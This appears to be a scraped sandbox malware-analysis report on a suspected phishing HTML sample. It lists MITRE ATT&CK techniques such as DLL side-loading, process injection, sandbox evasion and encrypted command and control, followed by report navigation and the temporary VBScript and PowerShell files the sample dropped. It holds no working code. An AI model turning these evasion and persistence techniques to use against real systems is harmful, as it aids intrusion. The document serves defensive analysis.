Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report COMPROVATIVO-14996813-MAR#U00c7O-ANCZ0-PD9BC - 208.html

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

HTML

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\5049.vbs

C:\Users\user\AppData\Local\Temp\9772.vbs

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2etv50i0.trz.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bsejgeqh.fjo.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i0ltq4d4.yty.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n0jwc3jg.ko0.psm1

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Chrome Cache Entry: 64

Chrome Cache Entry: 65

Chrome Cache Entry: 66

Static File Info

General

Network Behavior

Windows Analysis Report
COMPROVATIVO-14996813-MAR#U00c7O-ANCZ0-PD9BC - 208.html